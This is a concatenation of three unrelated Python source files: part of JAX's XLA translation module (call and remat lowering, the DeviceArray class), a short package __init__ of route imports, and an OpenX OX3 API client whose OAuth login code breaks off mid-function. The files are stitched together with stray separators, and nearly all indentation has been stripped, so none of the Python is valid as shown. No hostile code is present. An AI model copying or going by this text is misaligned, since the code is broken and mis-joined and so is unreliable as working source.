# JaxprTrace.post_process_call creates a call with no input tracers
new_donated_invars = (False,) * len(call_jaxpr.invars)
else:
# JaxprTrace.process_call drops known input tracers
donated_invars = [d for d, uk in zip(donated_invars, in_unknowns) if uk]
new_donated_invars = ((False,) * (len(call_jaxpr.invars) - len(donated_invars))
+ tuple(donated_invars))
return dict(params, donated_invars=new_donated_invars)
pe.call_param_updaters[xla_call_p] = _xla_call_partial_eval_update_params
def _xla_call_jvp_update_params(params, nz_tangents, nz_tangents_out_thunk):
donated_invars = params['donated_invars']
donated_tangents = [d for d, nz in zip(donated_invars, nz_tangents) if nz]
new_donated_invars = (*donated_invars, *donated_tangents)
return dict(params, donated_invars=new_donated_invars)
ad.call_param_updaters[xla_call_p] = _xla_call_jvp_update_params
def _xla_call_transpose_update_params(params, undef_primals, nonzero_cts):
donated_invars = params['donated_invars']
donated_primals = [d for d, u in zip(donated_invars, undef_primals) if not u]
donated_cotangents = [False for nz in nonzero_cts if nz]
return dict(params, donated_invars=(*donated_primals, *donated_cotangents))
ad.call_transpose_param_updaters[xla_call_p] = _xla_call_transpose_update_params
def _xla_call_translation_rule(c, axis_env, in_nodes, name_stack, backend, name,
call_jaxpr, donated_invars, inline=None, device=None):
del device, donated_invars, inline # Ignored.
subc = xb.make_computation_builder(f"jit_{name}")
args = [xb.parameter(subc, i, c.get_shape(n)) for i, n in enumerate(in_nodes)]
out_nodes = jaxpr_subcomp(subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, 'jit')), *args)
subc = subc.build(xops.Tuple(subc, out_nodes))
return xops.Call(c, subc, list(in_nodes))
ad.primitive_transposes[xla_call_p] = partial(ad.call_transpose, xla_call_p)
### translation tables
translations: Dict[core.Primitive, Callable] = {}
translations_with_avals: Dict[core.Primitive, Callable] = {}
parallel_translations: Dict[core.Primitive, Callable] = {}
initial_style_translations: Dict[core.Primitive, Callable] = {}
call_translations: Dict[core.Primitive, Callable] = {}
backend_specific_translations: Dict[str, Dict[core.Primitive, Callable]] = defaultdict(dict)
call_translations[xla_call_p] = _xla_call_translation_rule
def zeros_like_translation_rule(c, x):
shape = c.get_shape(x)
assert not shape.is_tuple()
zero = xb.constant(c, np.array(0, shape.element_type()))
return xops.Broadcast(zero, shape.dimensions())
translations[ad_util.zeros_like_p] = zeros_like_translation_rule
def add_jaxvals_translation_rule(c, x, y):
shape = c.get_shape(x)
assert not shape.is_tuple()
return xops.Add(x, y)
translations[ad_util.add_jaxvals_p] = add_jaxvals_translation_rule
translations[ad_util.stop_gradient_p] = lambda c, x: x
@lu.transformation
def _tuple_output(*args, **kwargs):
ans = yield args, kwargs
yield (ans,)
def lower_fun(fun, multiple_results, parallel=False, with_avals=False, backend=None):
# TODO(jakevdp): migrate dependent code & always use the with_avals=True.
def f(c, *xla_args, **params):
avals = [_array_aval_from_xla_shape(c.get_shape(x)) for x in xla_args]
return f_with_avals(c, avals, xla_args, params)
def f_with_avals(c, avals, xla_args, params):
if parallel:
axis_env = params.pop('axis_env')
del params['platform']
else:
axis_env = AxisEnv(1, (), ())
wrapped_fun = lu.wrap_init(fun, params)
if not multiple_results:
wrapped_fun = _tuple_output(wrapped_fun)
with core.extend_axis_env_nd(zip(axis_env.names, axis_env.sizes)):
jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(wrapped_fun, avals)
outs = jaxpr_subcomp(c, jaxpr, backend, axis_env, _xla_consts(c, consts), '',
*xla_args)
if multiple_results or any(v.aval._num_buffers > 1 for v in jaxpr.outvars):
return xops.Tuple(c, outs)
else:
assert len(outs) == 1, outs
return outs[0]
return f_with_avals if with_avals else f
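# Illustrative registration sketch (not part of the original module; the primitive
# and its implementation below are hypothetical): lower_fun lets a primitive's
# Python implementation double as its XLA translation rule, e.g.
#
#   my_p = core.Primitive('my_prim')
#   my_p.def_impl(_my_prim_impl)
#   translations[my_p] = lower_fun(_my_prim_impl, multiple_results=False)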
def _array_aval_from_xla_shape(xla_shape):
  # This function instantiates the assumption that we can map from XLA array
# types to JAX array types.
# TODO(mattjj): remove assumption can map XLA array types to JAX array types
assert not xla_shape.is_tuple()
return ShapedArray(xla_shape.dimensions(), xla_shape.numpy_dtype())
def lower_fun_initial_style(fun):
def f(c, axis_env, name_stack, avals, backend, *xla_args, **params):
jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(lu.wrap_init(fun, params), avals)
outs = jaxpr_subcomp(c, jaxpr, backend, axis_env, _xla_consts(c, consts),
name_stack, *xla_args)
return xops.Tuple(c, outs)
return f
### device-persistent data
class Token(object): pass
token = Token()
pytype_aval_mappings[Token] = lambda _: abstract_token
core.pytype_aval_mappings[Token] = lambda _: abstract_token
xla_shape_handlers[AbstractToken] = lambda _: (xc.Shape.token_shape(),)
xla_result_handlers[AbstractToken] = lambda _, __: lambda _: token
canonicalize_dtype_handlers[Token] = identity
device_put_handlers[Token] = lambda x, _: (x,)
def _forward_method(attrname, self, fun, *args):
return fun(getattr(self, attrname), *args)
_forward_to_value = partial(_forward_method, "_value")
# The following is used for the type _CppDeviceArray or _DeviceArray.
DeviceArrayProtocol = Any
DeviceArray = xc.DeviceArrayBase
_CppDeviceArray: DeviceArrayProtocol = xc.Buffer
def make_device_array(
aval: core.ShapedArray,
device: Optional[Device],
device_buffer: PyLocalBuffer,
) -> Union[PyLocalBuffer, "_DeviceArray"]:
"""Returns a DeviceArray implementation based on arguments.
  This is to be used only within JAX. It will return either a Python DeviceArray
or a C++ equivalent implementation.
"""
if (isinstance(device_buffer, _CppDeviceArray)):
if device_buffer.aval == aval and device_buffer._device == device:
return device_buffer
device_buffer = device_buffer.clone()
device_buffer._device = device
device_buffer.aval = aval
device_buffer.weak_type = aval.weak_type
return device_buffer
return _DeviceArray(aval, device, device_buffer)
def type_is_device_array(x):
"""Returns `True` if `x` is a non-sharded DeviceArray.
  Use this function instead of `type(x) is DeviceArray`.
"""
type_x = type(x)
return type_x is _DeviceArray or type_x is _CppDeviceArray
def device_array_supports_weakrefs():
try:
weakref.ref(DeviceArray())
return True
except TypeError:
return False
class _DeviceArray(DeviceArray): # type: ignore
"""A DeviceArray is an ndarray backed by a single device memory buffer."""
# We don't subclass ndarray because that would open up a host of issues,
# but lax_numpy.py overrides isinstance behavior and attaches ndarray methods.
__slots__ = [
"aval", "device_buffer", "_npy_value", "_device", "__weakref__"
]
__array_priority__ = 100
# DeviceArray has methods that are dynamically populated in lax_numpy.py,
# and this annotation is needed to make pytype happy.
_HAS_DYNAMIC_ATTRIBUTES = True
def __init__(self, aval: core.ShapedArray, device: Optional[Device],
device_buffer: PyLocalBuffer):
"""Initializer.
Args:
aval: The abstract value associated to this array (shape+dtype+weak_type).
device: The optional sticky device. See
https://jax.readthedocs.io/en/latest/faq.html#controlling-data-and-computation-placement-on-devices
device_buffer: The underlying buffer owning the on-device data.
"""
DeviceArray.__init__(self)
self.aval = aval
self.device_buffer = device_buffer
self._device = device
self._npy_value = None
if config.jax_enable_checks:
assert type(aval) is ShapedArray
npy_value = self._value
assert npy_value.dtype == aval.dtype and npy_value.shape == aval.shape
assert (device is None) or device is device_buffer.device()
def _check_if_deleted(self):
if self.device_buffer is deleted_buffer:
raise RuntimeError("DeviceArray has been deleted.")
def block_until_ready(self):
"""Blocks the caller until the buffer's value has been computed on device.
This method is mostly useful for timing microbenchmarks that wish to
time how long a computation takes, without transferring the result back
to the host.
Returns the buffer object (`self`).
"""
self._check_if_deleted()
self.device_buffer.block_host_until_ready() # pytype: disable=attribute-error
return self
@property
def _value(self):
self._check_if_deleted()
if self._npy_value is None:
self._npy_value = self.device_buffer.to_py()
self._npy_value.flags.writeable = False
return self._npy_value
@property
def shape(self):
return self.aval.shape
@property
def dtype(self):
return self.aval.dtype
@property
def size(self):
return prod(self.aval.shape)
@property
def ndim(self):
return len(self.aval.shape)
def copy_to_host_async(self):
"""Requests a copy of the buffer to the host."""
self._check_if_deleted()
if self._npy_value is None:
self.device_buffer.copy_to_host_async() # pytype: disable=attribute-error
def delete(self):
"""Deletes the device array and any cached copy on the host.
It is an error to access the contents of a `DeviceArray` after it has
been deleted.
Use of this method is optional; device buffers will be reclaimed
automatically by Python when a DeviceArray object is garbage collected.
However, it is sometimes useful to have more explicit control over the
time of deletion.
"""
self.device_buffer.delete() # pytype: disable=attribute-error
self.device_buffer = deleted_buffer
self._npy_value = None
@property
def __cuda_array_interface__(self):
return self.device_buffer.__cuda_array_interface__
# Adding methods dynamically to both _DeviceArray and _CppDeviceArray
# pylint: disable=protected-access
for device_array in [DeviceArray]:
def copy(self):
"""Returns an ndarray (backed by host memory, not device memory)."""
return np.asarray(self)
setattr(device_array, "copy", copy)
def __repr__(self):
line_width = np.get_printoptions()["linewidth"]
prefix = '{}('.format(self.__class__.__name__.lstrip('_'))
s = np.array2string(self._value, prefix=prefix, suffix=',',
separator=', ', max_line_width=line_width)
dtype_str = 'dtype={})'.format(self.dtype.name)
last_line_len = len(s) - s.rfind('\n') + 1
sep = ' '
if last_line_len + len(dtype_str) + 1 > line_width:
sep = ' ' * len(prefix)
return "{}{},{}{}".format(prefix, s, sep, dtype_str)
setattr(device_array, "__repr__", __repr__)
def item(self):
if dtypes.issubdtype(self.dtype, np.complexfloating):
return complex(self)
elif dtypes.issubdtype(self.dtype, np.floating):
return float(self)
elif dtypes.issubdtype(self.dtype, np.integer):
return int(self)
elif dtypes.issubdtype(self.dtype, np.bool_):
return bool(self)
else:
raise TypeError(self.dtype)
setattr(device_array, "item", item)
def __len__(self):
try:
return self.aval.shape[0]
except IndexError as err:
raise TypeError("len() of unsized object") from err # same as numpy error
setattr(device_array, "__len__", __len__)
def __iter__(self):
if self.ndim == 0:
raise TypeError("iteration over a 0-d array") # same as numpy error
else:
return self._value.__iter__()
setattr(device_array, "__iter__", __iter__)
def __reversed__(self):
if self.ndim == 0:
raise TypeError("iteration over a 0-d array")
else:
return reversed(self._value)
setattr(device_array, "__reversed__", __reversed__)
def __format__(self, format_spec):
# Simulates behavior of https://github.com/numpy/numpy/pull/9883
if self.ndim == 0:
return format(self._value[()], format_spec)
else:
return format(self._value, format_spec)
setattr(device_array, "__format__", __format__)
def __array__(self, dtype=None, context=None):
return np.asarray(self._value, dtype=dtype)
setattr(device_array, "__array__", __array__)
setattr(device_array, "__str__", partialmethod(_forward_to_value, str))
setattr(device_array, "__bool__", partialmethod(_forward_to_value, bool))
setattr(device_array, "__nonzero__", partialmethod(_forward_to_value, bool))
setattr(device_array, "__float__", lambda self: self._value.__float__())
setattr(device_array, "__int__", lambda self: self._value.__int__())
setattr(device_array, "__complex__", lambda self: self._value.__complex__())
setattr(device_array, "__hex__", partialmethod(_forward_to_value, hex))
setattr(device_array, "__oct__", partialmethod(_forward_to_value, oct))
setattr(device_array, "__index__", partialmethod(_forward_to_value, op.index))
to_bytes = lambda self, order="C": self._value.tobytes(order)
setattr(device_array, "tobytes", to_bytes)
del to_bytes
setattr(device_array, "tolist", lambda self: self._value.tolist())
# pickle saves and loads just like an ndarray
setattr(device_array, "__reduce__",
partialmethod(_forward_to_value, op.methodcaller("__reduce__")))
# explicitly set to be unhashable.
setattr(device_array, "__hash__", None)
# clobbered when jax.numpy is imported, but useful in tests
setattr(device_array, "__eq__", lambda self, other: self._value == other)
# The following methods are dynamically overridden in lax_numpy.py.
def raise_not_implemented():
raise NotImplementedError
setattr(device_array, "__getitem__", lambda self, i: raise_not_implemented())
# pylint: enable=protected-access
class DeletedBuffer(object): pass
deleted_buffer = DeletedBuffer()
for device_array in [_CppDeviceArray, _DeviceArray]:
core.literalable_types.add(device_array)
core.pytype_aval_mappings[device_array] = ConcreteArray
pytype_aval_mappings[device_array] = op.attrgetter('aval')
canonicalize_dtype_handlers[device_array] = identity
def _device_array_constant_handler(c, val, canonicalize_types=True):
return xb.constant_general(c, val.device_buffer.to_py())
xb.register_constant_handler(_DeviceArray, _device_array_constant_handler)
xb.register_constant_handler(_CppDeviceArray, _device_array_constant_handler)
def _device_put_device_array(x: Union[DeviceArrayProtocol, _DeviceArray], device: Optional[Device]):
x = _copy_device_array_to_device(x, device)
return (x.device_buffer,)
device_put_handlers[_CppDeviceArray] = _device_put_device_array
device_put_handlers[_DeviceArray] = _device_put_device_array
def _copy_device_array_to_device(x: Union[DeviceArrayProtocol, _DeviceArray], device: Optional[xc.Device]) -> Union[DeviceArrayProtocol, _DeviceArray]:
if device is None:
# no copying to be done because there's no target specified
return x
elif xb.get_device_backend(device).platform == x.device_buffer.platform():
# source and target platforms are the same
if x.device_buffer.device() == device:
# no copying to be done because source equals target
if x._device == device:
return x
else:
moved_buf = x.device_buffer # We need to change stickyness
else:
# move the buffer with a device-to-device copy
moved_buf = x.device_buffer.copy_to_device(device)
else:
# buffers from different XLA backends are passed through the host.
backend = xb.get_device_backend(device)
moved_buf = backend.buffer_from_pyval(x.device_buffer.to_py(), device)
return make_device_array(x.aval, device, moved_buf)
def _device_put_impl(x, device: Optional[Device] = None):
if type_is_device_array(x):
return _copy_device_array_to_device(x, device)
try:
a = abstractify(x)
except TypeError as err:
raise TypeError(
f"Argument '{x}' of type {type(x)} is not a valid JAX type") from err
return aval_to_result_handler(device, a)(*device_put(x, device))
device_put_p = core.Primitive('device_put')
device_put_p.def_impl(_device_put_impl)
device_put_p.def_abstract_eval(lambda x, device=None: x)
translations[device_put_p] = lambda c, x, device=None: x
ad.deflinear2(device_put_p, lambda cotangent, _, **kwargs: [cotangent])
masking.defvectorized(device_put_p)
def _zeros(c, xla_shape):
if xla_shape.is_array():
shape, dtype = xla_shape.dimensions(), xla_shape.numpy_dtype()
zero = xb.constant(c, np.array(0, dtype=dtype))
return xops.Broadcast(zero, shape)
else:
# It is a token
return xops.CreateToken(c)
def _remat_using_cond(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr):
"""Lower remat to a Conditional which always returns true. This:
1. Circumvents common subexpression elimination.
  2. In the common case of `jax.grad(jax.remat(f))`, ensures the remat blocks
     occur after the primal blocks, because the cotangent is an input to the
     Conditional."""
# Fake condition which always selects True branch.
rng = xops.RngUniform(xb.constant(c, np.array(0, dtype=np.float32)),
xb.constant(c, np.array(1, dtype=np.float32)),
xc.Shape.array_shape(xc.PrimitiveType.F32, []))
pred = xops.Lt(rng, xb.constant(c, np.array(2, dtype=np.float32)))
true_op = xops.Tuple(c, in_nodes)
remat_subc = xb.make_computation_builder("remat_call_subcomputation")
input_op = xb.parameter(remat_subc, 0, c.get_shape(true_op), replicated=[])
args = xla_destructure(remat_subc, input_op)
out_nodes = jaxpr_subcomp(remat_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, 'remat')),
*args)
out_node_shapes = [remat_subc.get_shape(o) for o in out_nodes]
remat_subc = remat_subc.build(xops.Tuple(remat_subc, out_nodes))
false_op = true_op
dummy_subc = xb.make_computation_builder("remat_call_dummy_subcomputation")
xb.parameter(dummy_subc, 0, c.get_shape(false_op), replicated=[])
out_nodes = [_zeros(dummy_subc, s) for s in out_node_shapes]
dummy_subc = dummy_subc.build(xops.Tuple(dummy_subc, out_nodes))
return xops.Conditional(pred, true_op, remat_subc, false_op, dummy_subc)
def _remat_using_while(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr):
"""Lower remat to a single iteration while loop."""
# Dummy subc for getting subcomp shapes.
dummy_inputs = xops.Tuple(c, in_nodes)
dummy_subc = xb.make_computation_builder("remat_dummy_subcomputation")
dummy_input_op = xb.parameter(dummy_subc, 0, c.get_shape(dummy_inputs), replicated=[])
dummy_args = xla_destructure(dummy_subc, dummy_input_op)
dummy_subcomp_outs = jaxpr_subcomp(
dummy_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, "remat")), *dummy_args)
out_node_shapes = [dummy_subc.get_shape(o) for o in dummy_subcomp_outs]
i_init = xb.constant(c, np.array(0, dtype=np.int32))
zeros_like_outs = [_zeros(c, s) for s in out_node_shapes]
inputs = xops.Tuple(c, [i_init] + in_nodes + zeros_like_outs)
cond_subc = xb.make_computation_builder("remat_cond_subcomputation")
input_op = xb.parameter(cond_subc, 0, c.get_shape(inputs), replicated=[])
i = xops.GetTupleElement(input_op, 0)
rng = xops.RngUniform(xb.constant(cond_subc, np.array(1, dtype=np.int32)),
xb.constant(cond_subc, np.array(2, dtype=np.int32)),
xc.Shape.array_shape(xc.PrimitiveType.S32, []))
cond_subc = cond_subc.build(xops.Lt(i, rng))
body_subc = xb.make_computation_builder("remat_body_subcomputation")
input_op = xb.parameter(body_subc, 0, c.get_shape(inputs), replicated=[])
i, *args = xla_destructure(body_subc, input_op)[:len(in_nodes)+1]
i_next = xops.Add(i, xb.constant(body_subc, np.array(1, dtype=np.int32)))
subcomp_outs = jaxpr_subcomp(
body_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, "remat")), *args)
out_nodes = [i_next] + args + subcomp_outs
body_subc = body_subc.build(xops.Tuple(body_subc, out_nodes))
outs = xops.While(cond_subc, body_subc, inputs)
return xops.Tuple(c, xla_destructure(c, outs)[len(in_nodes)+1:])
def _remat_translation_rule(c, axis_env, in_nodes,
name_stack, backend, name, call_jaxpr,
prevent_cse, differentiated, concrete, device=None):
del device, concrete # Unused.
if differentiated and prevent_cse:
if backend == "gpu":
return _remat_using_while(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr)
else:
return _remat_using_cond(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr)
else:
outs = jaxpr_subcomp(c, call_jaxpr, backend, axis_env, (), "", *in_nodes)
return xops.Tuple(c, outs)
call_translations[pe.remat_call_p] = _remat_translation_rule # type: ignore
ad.primitive_transposes[core.named_call_p] = partial(ad.call_transpose,
core.named_call_p)
def _named_call_translation_rule(c, axis_env, in_nodes, name_stack, *,
name="core_call", backend, call_jaxpr):
subc = xb.make_computation_builder(name)
args = [xb.parameter(subc, i, c.GetShape(n)) for i, n in enumerate(in_nodes)]
out_nodes = jaxpr_subcomp(subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, name), *args)
subc = subc.Build(xops.Tuple(subc, out_nodes))
return xops.Call(c, subc, list(in_nodes))
call_translations[core.named_call_p] = _named_call_translation_rule
def _call_translation_rule(c, axis_env, in_nodes, name_stack, *, backend,
call_jaxpr):
return _named_call_translation_rule(
c, axis_env, in_nodes, name_stack, name="core_call",
backend=backend, call_jaxpr=call_jaxpr)
call_translations[core.call_p] = _call_translation_rule
|
from .commandroute import CommandRoute
from .documentroute import DocumentRoute
from .imageroute import ImageRoute
from .messageroute import MessageRoute
|
# -*- coding: utf-8 -*-
from six.moves import configparser as ConfigParser
from six.moves import http_cookiejar as cookielib
import logging
import mimetypes
from pprint import pformat
import random
import json
from six.moves.urllib.parse import parse_qs, urlparse
import requests
from requests_oauthlib import OAuth1
__version__ = '0.6.1'
REQUEST_TOKEN_URL = 'https://sso.openx.com/api/index/initiate'
ACCESS_TOKEN_URL = 'https://sso.openx.com/api/index/token'
AUTHORIZATION_URL = 'https://sso.openx.com/login/process'
API_PATH_V1 = '/ox/3.0'
API_PATH_V2 = '/ox/4.0'
API_PATH_SSO = '/api'
ODS_PATH_V1 = '/data/1.0'
ACCEPTABLE_PATHS = (API_PATH_V1, API_PATH_V2, API_PATH_SSO, ODS_PATH_V1)
JSON_PATHS = (API_PATH_V2,ODS_PATH_V1)
HTTP_METHOD_OVERRIDES = ['DELETE', 'PUT', 'OPTIONS']
class UnknownAPIFormatError(ValueError):
"""Client is passed an unrecognized API path that it cannot handle."""
pass
class OAuthException(Exception):
"""Client encountered an Oauth error."""
pass
class Client(object):
"""Client for making requests to the OX3 API. Maintains
authentication and points all requests at a domain+path
combination. Handles request and response data in the form
of Python dictionaries, translated to and from the JSON and
query string encoding the API itself uses.
"""
def __init__(self, domain, realm, consumer_key, consumer_secret,
callback_url='oob',
scheme='http',
request_token_url=REQUEST_TOKEN_URL,
access_token_url=ACCESS_TOKEN_URL,
authorization_url=AUTHORIZATION_URL,
api_path=API_PATH_V1,
email=None,
password=None,
http_proxy=None,
https_proxy=None,
headers=None,
timeout=None):
"""
domain -- Your UI domain. The API is accessed off this domain.
realm -- This is no longer used. Just specify None.
consumer_key -- Your consumer key.
consumer_secret -- Your consumer secret.
callback_url -- Callback URL to redirect to on successful authorization.
We default to 'oob' for headless login.
        request_token_url -- Only override for debugging.
        access_token_url -- Only override for debugging.
        authorization_url -- Only override for debugging.
        api_path -- Only override for debugging.
        http_proxy -- Optional proxy to send HTTP requests through.
        https_proxy -- Optional proxy to send HTTPS requests through.
        headers -- dict of headers to send with each request.
        timeout -- HTTP request timeout in seconds.
"""
self.domain = domain
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.callback_url = callback_url
self.scheme = scheme
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
self.api_path = api_path
self.timeout = timeout
# Validate API path:
if api_path not in ACCEPTABLE_PATHS:
msg = '"{}" is not a recognized API path.'.format(api_path)
msg += '\nLegal paths include:'
for i in ACCEPTABLE_PATHS:
msg += '\n{}'.format(i)
raise UnknownAPIFormatError(msg)
# These get cleared after log on attempt.
self._email = email
self._password = password
# You shouldn't need to access the token and session objects directly so we'll keep them private.
self._token = None
self._session = requests.Session()
# set supplied headers and proxies
if headers:
self._session.headers.update(headers)
if http_proxy:
self._session.proxies.update({'http': http_proxy})
if https_proxy:
self._session.proxies.update({'https': https_proxy})
self.logger = logging.getLogger(__name__)
def log_request(self, response):
self.logger.debug('====={0:=<45}'.format('OX3 api call started'))
self.logger.debug("%s %s" % (response.request.method, response.request.url))
self.logger.debug('====={0:=<45}'.format('OX3 api call request headers'))
for k, v in response.request.headers.items():
self.logger.debug("%s: %s" % (k, v))
self.logger.debug('====={0:=<45}'.format('OX3 api call request body'))
self.logger.debug("%s" % response.request.body)
self.logger.debug('====={0:=<45}'.format('OX3 api call response headers'))
for k, v in response.headers.items():
self.logger.debug("%s: %s" % (k, v))
self.logger.debug('====={0:=<45}'.format('OX3 api call response body'))
try:
self.logger.debug(pformat(json.loads(response.text)))
except ValueError:
self.logger.debug("%s" % response.text)
self.logger.debug('====={0:=<45}'.format('OX3 api call finished'))
def request(self, url, method='GET', headers=None, data=None, sign=False,
send_json=False):
"""Helper method to make a (optionally OAuth signed) HTTP request."""
if headers is None:
headers = {}
if sign:
oauth = OAuth1(client_key=self.consumer_key,
resource_owner_key=self._token,
callback_uri=self.callback_url,
signature_type='query')
else:
oauth = None
if send_json:
response = self._session.request(method, self._resolve_url(url), headers=headers,
json=data, auth=oauth, timeout=self.timeout)
else:
response = self._session.request(method, self._resolve_url(url), headers=headers,
data=data, auth=oauth, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return response
def fetch_request_token(self):
"""Helper method to fetch and set request token.
Returns token string.
"""
oauth = OAuth1(client_key=self.consumer_key,
client_secret=self.consumer_secret,
callback_uri=self.callback_url,
signature_type='auth_header')
response = self._session.post(url=self.request_token_url, auth=oauth, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth token request failed (%s) %s" % (response.status_code, response.text))
credentials = parse_qs(response.text)
self._token = {'key': credentials['oauth_token'][0],
'secret': credentials['oauth_token_secret'][0]}
return self._token
def authorize_token(self, email=None, password=None):
"""Helper method to authorize."""
# Give precedence to credentials passed in methods calls over those set
# in the instance. This allows you to override user creds that may have
# been loaded from a file.
if not email:
email = self._email
if not password:
password = self._password
if not email or not password:
raise Exception('Missing email or password')
data = {
'email': email,
'password': password,
'oauth_token': self._token['key']}
response = self._session.post(url=self.authorization_url, data=data, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth login failed (%s) %s" % (response.status_code, response.text))
# set token verifier
self._token['verifier'] = parse_qs(response.text)['oauth_verifier'][0]
def fetch_access_token(self):
"""Helper method to fetch and set access token.
Returns token string.
"""
oauth = OAuth1(client_key=self.consumer_key,
client_secret=self.consumer_secret,
resource_owner_key=self._token['key'],
resource_owner_secret=self._token['secret'],
verifier=self._token['verifier'],
callback_uri=self.callback_url,
signature_type='auth_header')
response = self._session.post(url=self.access_token_url, auth=oauth, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth token verification failed (%s) %s" % (response.status_code, response.text))
self._token = parse_qs(response.text)['oauth_token'][0]
return self._token
def validate_session(self):
"""Validate an API session."""
# We need to store our access token as the openx3_access_token cookie.
# This cookie will be passed to all future API requests.
cookie = cookielib.Cookie(
version=0,
name='openx3_access_token',
value=self._token,
port=None,
port_specified=False,
domain=self.domain,
domain_specified=True,
domain_initial_dot=False,
path='/',
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest={})
self._session.cookies.set_cookie(cookie)
# v2 doesn't need this extra step, just the cookie:
if self.api_path == API_PATH_V1:
response = self._session.put(url=self._resolve_url('/a/session/validate'), timeout=self.timeout)
self.log_request(response)
return response.text
def logon(self, email=None, password=None):
"""Returns self after authentication.
Single call to complete OAuth login process.
Keyword arguments:
email -- user email address.
password -- user password.
"""
self.fetch_request_token()
self.authorize_token(email=email, password=password)
self.fetch_access_token()
self.validate_session()
return self
def logoff(self):
"""Returns self after deleting authenticated session."""
if self.api_path == API_PATH_V1:
response = self._session.delete(self._resolve_url('/a/session'), timeout=self.timeout)
elif self.api_path == API_PATH_V2:
response = self._session.delete(self._resolve_url('/session'), timeout=self.timeout)
elif self.api_path == API_PATH_SSO:
oauth = OAuth1(client_key=self.consumer_key,
resource_owner_key=self._token,
callback_uri=self.callback_url,
signature_type='query')
response = self._session.delete(url=self.access_token_url, auth=oauth, timeout=self.timeout)
if response.status_code != 204:
raise OAuthException("OAuth token deletion failed (%s) %s" % (response.status_code, response.text))
else:
raise UnknownAPIFormatError(
'Unrecognized API path: %s' % self.api_path)
self.log_request(response)
return self
def _resolve_url(self, url):
"""Converts an API path shorthand into a full URL unless
given a full url already.
"""
parse_res = urlparse(url)
# 2.4 returns a tuple instead of ParseResult. Since ParseResult is a
        # subclass of tuple we can access URL components similarly across
# 2.4 - 2.7. Yay!
# If there is no scheme specified we create a fully qualified URL.
if not parse_res[0]:
url = '%s://%s%s%s' % (self.scheme, self.domain, self.api_path,
parse_res[2])
if parse_res[4]:
url = url + '?' + parse_res[4]
return url
def _response_value(self, response):
""" Utility method. Returns decoded json. If the response content cannot be decoded, then
the text is returned.
"""
try:
return response.json()
except ValueError:
return response.text
def get(self, url, params=None):
"""Issue a GET request to the given URL or API shorthand
"""
response = self._session.get(self._resolve_url(url), params=params, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def options(self, url):
"""Send a request with HTTP method OPTIONS to the given
URL or API shorthand.
OX3 v2 uses this method for showing help information.
"""
response = self._session.options(self._resolve_url(url), timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def put(self, url, data=None):
"""Issue a PUT request to url (either a full URL or API
shorthand) with the data.
"""
if self.api_path in JSON_PATHS:
response = self._session.put(self._resolve_url(url), data=json.dumps(data), timeout=self.timeout)
else:
response = self._session.put(self._resolve_url(url), data=data, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def post(self, url, data=None):
"""Issue a POST request to url (either a full URL or API
shorthand) with the data.
"""
if self.api_path in JSON_PATHS:
response = self._session.post(self._resolve_url(url), data=json.dumps(data), timeout=self.timeout)
else:
response = self._session.post(self._resolve_url(url), data=data, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def delete(self, url):
"""Issue a DELETE request to the URL or API shorthand."""
response = self._session.delete(self._resolve_url(url))
self.log_request(response)
response.raise_for_status()
# Catch no content responses from some delete actions.
if response.status_code == 204:
return []
return self._response_value(response)
def upload_creative(self, account_id, file_path):
"""Upload a media creative to the account with ID
account_id from the local file_path.
"""
# Thanks to nosklo for his answer on SO:
# http://stackoverflow.com/a/681182
boundary = '-----------------------------' + str(int(random.random() * 1e10))
parts = []
# Set account ID part.
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="account_id"')
parts.append('')
parts.append(str(account_id))
# Set creative contents part.
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="userfile"; filename="%s"' % file_path)
        parts.append('Content-Type: %s' % (mimetypes.guess_type(file_path)[0] or 'application/octet-stream'))
parts.append('')
# TODO: catch errors with opening file.
with open(file_path, 'r') as f:
parts.append(f.read())
parts.append('--' + boundary + '--')
parts.append('')
body = '\r\n'.join(parts)
# TODO: Catch errors in attempt to upload.
headers = {'content-type': 'multipart/form-data; boundary=' + boundary}
if self.api_path == API_PATH_V1:
url = self._resolve_url('/a/creative/uploadcreative')
elif self.api_path == API_PATH_V2:
url = self._resolve_url('/creative/uploadcreative')
else:
raise UnknownAPIFormatError(
'Unrecognized API path: %s' % self.api_path)
        response = self._session.post(url, headers=headers, data=body, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def client_from_file(file_path='.ox3rc', env=None):
"""Return an instance of ox3apiclient.Client with data from file_path.
Keyword arguments:
    file_path -- the file to load. Default is '.ox3rc' from the current dir.
env -- the env section to load. Default will be first env section.
"""
cp = ConfigParser.RawConfigParser()
cp.read(file_path)
# Load default env if no env is specified. The default env is just the first
# env listed.
if not env:
env = [e for e in cp.get('ox3apiclient', 'envs').split('\n') if e][0]
# Required parameters for a ox3apiclient.Client instance.
required_params = [
'domain',
'consumer_key',
'consumer_secret']
client_params = {}
# Load required parameters.
try:
for param in required_params:
client_params[param] = cp.get(env, param)
except ConfigParser.NoOptionError:
err_msg = "Missing required option: '%s'" % param
raise Exception(err_msg)
client = Client(
domain=client_params['domain'],
realm=None,
consumer_key=client_params['consumer_key'],
